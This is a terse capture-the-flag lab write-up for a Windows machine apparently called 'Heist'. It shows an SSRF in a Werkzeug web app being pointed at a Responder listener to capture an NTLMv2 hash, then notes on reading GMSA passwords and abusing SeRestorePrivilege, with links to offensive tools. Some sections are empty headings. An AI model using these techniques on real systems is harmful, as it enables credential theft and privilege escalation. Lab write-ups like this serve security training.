Heist

Enumeration

5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp  open  http          Werkzeug httpd 2.0.1 (Python 3.9.0)
| http-methods: 
|_  Supported Methods: HEAD OPTIONS GET
|_http-title: Super Secure Web Browser

http://192.168.147.165:8080/?url=http://localhost:8080 - SSRF

# cd /usr/share/responder
# python3 Responder.py -I tun0 --lm -v

http://192.168.147.165:8080/?url=http%3A%2F%2F192.168.49.147%2F

[HTTP] Sending NTLM authentication request to 192.168.147.165
[HTTP] GET request from: 192.168.147.165  URL: / 
[HTTP] Host             : 192.168.49.147 
[HTTP] NTLMv2 Client   : 192.168.147.165
[HTTP] NTLMv2 Username : HEIST\enox
[HTTP] NTLMv2 Hash     : enox::HEIST:[REDACTED]

NTLMv2 Hash -> hash.txt

Initial Access

Lateral Movement

svc_apache$ -> managed service account

Enox account in the Web Admins group. May be, we have some power over the Apache account.

Group Managed Service Accounts (GMSA)

Group Managed Service Accounts provide a higher security option for non-interactive applications, services, processes, or tasks that run automatically but need a security credential.

These service accounts are given automatically-generated passwords. Given certain permissions, it is possible to retrieve these password hashes from Active Directory. To see what users or groups have permissions to do that for a given service account, we can look up the PrincipalsAllowedToRetrieveManagedPassword user property on the account.

https://github.com/CsEnox/tools/raw/main/GMSAPasswordReader.exe

Current Value -> rc4_hmac

PrivEsc

SeRestorePrivilege - Enabled

https://github.com/dxnboy/redteam/blob/master/SeRestoreAbuse.exe

Last updated